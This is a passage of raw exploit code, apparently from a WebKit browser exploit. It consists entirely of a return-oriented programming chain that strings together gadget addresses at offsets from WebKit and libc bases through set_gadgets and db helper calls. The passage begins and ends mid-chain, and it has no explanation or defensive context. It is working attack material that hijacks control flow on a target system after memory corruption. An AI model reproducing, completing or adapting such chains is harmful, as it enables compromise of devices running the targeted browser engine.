ropchain+304544, //L5949 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5949: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+304672, //L5951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+304688, //L5952 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+304656, //L5950 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5950: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5951: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5952: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+304848, //L5956 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+304816, //L5954 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+304832, //L5955 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5953: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5954: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5955: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5956: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+304904, //L5958 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5958: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+305032, //L5960 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+305048, //L5961 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+305016, //L5959 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5959: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5960: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5961: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+305160, //L5962 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+305192, //L5964 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+305176, //L5963 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5962: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5963: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5964: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+782311, //pop rsp ropchain+307648, //L5965 //L5931: libc_base+764760, //pop rsi ropchain+305296, //L5966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5966: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5968: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+305416, //L5971 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+305400, //L5969 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5969: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5971: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, 
//mov eax, [rdi] libc_base+764760, //pop rsi ropchain+305592, //L5974 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+305608, //L5975 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+305560, //L5972 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+305576, //L5973 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5972: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5973: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5974: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5975: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+305704, //L5977 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+305688, //L5976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5976: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5977: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5978: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5979: db([5, 0]); // 0x5 set_gadget(libc_base+763368,); //pop rcx //L5980: db([5, 0]); // 0x5 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+305904, //L5982 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5982: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+305960, //L5983 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5983: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+306096, //L5987 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+306080, //L5986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5985: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5986: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5987: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+306232, //L5990 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+306264, //L5992 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+306216, //L5989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5989: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5990: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5991: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5992: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+306376, //L5993+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, 
//pop rsi ropchain+306368, //L5993 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5993: db([0, 0]); // 0x0 set_gadgets([ ropchain+306392, //L5993+24 ropchain+306424, //L5988 libc_base+759608 //pop rax ]); //L5995: db([65, 0]); // 0x41 set_gadgets([ libc_base+782311, //pop rsp ropchain+306440, //L5994 //L5988: libc_base+759608 //pop rax ]); //L5996: db([97, 0]); // 0x61 //L5994: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+306512, //L5997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5997: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5999: db([4294967255, 4294967295]); // -0x29 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+306632, //L6002 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+306616, //L6000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6000: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6002: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+306792, //L6006 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+306760, //L6004 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+306776, //L6005 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6003: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6004: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6005: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax 
//L6006: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+306848, //L6008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6008: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+306976, //L6010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+306992, //L6011 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+306960, //L6009 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6009: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6010: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6011: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+307152, //L6015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+307120, //L6013 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+307136, //L6014 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6012: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6013: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6014: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6015: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+307208, //L6017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6017: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+307336, //L6019 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, 
//mov rax, [rsi] libc_base+764760, //pop rsi ropchain+307352, //L6020 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+307320, //L6018 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6018: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6019: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6020: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+307464, //L6021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+307496, //L6023 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+307480, //L6022 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6021: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6022: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6023: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L6024: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L6025: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx //L5965: libc_base+764760, //pop rsi ropchain+307760, //L6027 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+307776, 
//L6028 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+307744, //L6026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6026: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6027: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6028: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+307936, //L6032 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+307904, //L6030 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+307920, //L6031 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6029: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6030: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6031: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6032: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+307992, //L6034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6034: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+308120, //L6036 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+308136, //L6037 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+308104, //L6035 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6035: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6036: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6037: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd 
rax, edi libc_base+764760, //pop rsi ropchain+308232, //L6039 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+308216, //L6038 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6038: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6039: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+308328, //L6041 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L6040: db([4294967264, 4294967295]); // -0x20 set_gadget(libc_base+759608,); //pop rax //L6041: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+308408, //L6043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6043: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+308464, //L6044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6044: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+308544, //L6046 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6046: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6048: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+308664, //L6051 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+308648, //L6049 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6049: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6051: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+308808, //L6054 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+308776, //L6052 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+308792, //L6053 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6052: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6053: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6054: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+308896, //L6056 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L6055: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L6056: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+308952, //L6057 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6057: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6059: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+309032, //L6061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6061: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); 
db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+309136, //L6062 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+309152, //L6063 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6062: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6063: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+309240, //L6065 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6065: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+309296, //L6066 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6066: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+309368, //L6069 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6069: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+309424, //L6070 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6070: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+309512, //L6072 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6072: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6074: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+309632, //L6077 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+309616, //L6075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6075: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6077: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+309776, //L6080 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+309744, //L6078 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+309760, //L6079 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6078: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6079: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6080: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+309856, //L6081 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6081: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6083: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+309976, //L6086 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+309960, //L6084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 
libc_base+763368 //pop rcx ]); //L6084: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6086: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+310088, //L6087 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+310120, //L6089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+310104, //L6088 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6087: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6088: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6089: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+310288, //L6092 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+755774, //mov rax, rsi libc_base+764760, //pop rsi ropchain+310256, //L6090 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+310272, //L6091 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6090: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6091: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6092: db([0, 0]); // 0x0 set_gadget(webkit_base+1438842,); //pop rdx db([0, 0]); // 0x0 set_gadgets([ webkit_base+24132920, //div rsi ; add rax, rcx libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+310368, //L6093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6093: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6095: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi 
webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L6097: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+310528, //L6100 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+310512, //L6098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6098: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6100: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+310688, //L6105 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+310704, //L6106 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+310640, //L6102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6102: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6103: 